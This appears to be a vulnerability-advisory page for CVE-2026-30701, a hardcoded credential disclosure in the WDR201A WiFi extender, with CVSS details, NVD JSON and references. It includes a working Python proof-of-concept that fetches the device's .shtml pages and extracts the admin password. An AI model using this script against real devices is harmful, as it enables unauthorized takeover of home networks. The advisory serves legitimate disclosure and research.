Security Vulnerability Report
中文
CVE-2026-30701 CVSS 9.1 CRITICAL

CVE-2026-30701

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-23 16:16:46
Source: [email protected]

Description

The web interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) contains hardcoded credential disclosure mechanisms (in the form of Server Side Include) within multiple server-side web pages, including login.shtml and settings.shtml. These pages embed server-side execution directives that dynamically retrieve and expose the web administration password from non-volatile memory at runtime.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A 硬件版本 V2.1
WiFi Extender WDR201A 固件版本 LFMZX28040922V1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-30701 PoC - WiFi Extender WDR201A Hardcoded Credential Disclosure This PoC demonstrates the Server Side Include (SSI) credential disclosure vulnerability """ import requests import re import sys TARGET_URL = "http://target-device-ip" VULNERABLE_PAGES = [ "/login.shtml", "/settings.shtml", "/status.shtml", "/wireless.shtml" ] def extract_credential(content): """Extract potential credentials from SSI response""" # Common patterns for password exposure patterns = [ r'password["\'\s:=]+([^<>"\'\s]+)', r'admin["\'\s:=]+([^<>"\'\s]+)', r'passwd["\'\s:=]+([^<>"\'\s]+)', r'value=["\']([^"\'<>]+)["\']', ] credentials = [] for pattern in patterns: matches = re.findall(pattern, content, re.IGNORECASE) credentials.extend(matches) return list(set(credentials)) def check_vulnerability(target): """Check if target is vulnerable to CVE-2026-30701""" print(f"[*] Testing target: {target}") print(f"[*] CVE-2026-30701: WDR201A SSI Credential Disclosure\n") found_creds = [] for page in VULNERABLE_PAGES: try: url = f"{target}{page}" print(f"[*] Requesting: {url}") response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: creds = extract_credential(response.text) if creds: print(f"[+] Potential credentials found on {page}:") for cred in creds: print(f" - {cred}") found_creds.extend(creds) except requests.RequestException as e: print(f"[!] Error accessing {page}: {e}") if found_creds: print(f"\n[!] VULNERABLE: Found {len(found_creds)} potential credentials") return True else: print(f"\n[*] No obvious credentials found (manual inspection recommended)") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30701", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.737", "lastModified": "2026-03-23T16:16:45.580", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The web interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) contains hardcoded credential disclosure mechanisms (in the form of Server Side Include) within multiple server-side web pages, including login.shtml and settings.shtml. These pages embed server-side execution directives that dynamically retrieve and expose the web administration password from non-volatile memory at runtime."}, {"lang": "es", "value": "La interfaz web del Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) contiene mecanismos de divulgación de credenciales codificados de forma rígida (en forma de Server Side Include) dentro de múltiples páginas web del lado del servidor, incluyendo login.shtml y settings.shtml. Estas páginas incrustan directivas de ejecución del lado del servidor que recuperan y exponen dinámicamente la contraseña de administración web de la memoria no volátil en tiempo de ejecución."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.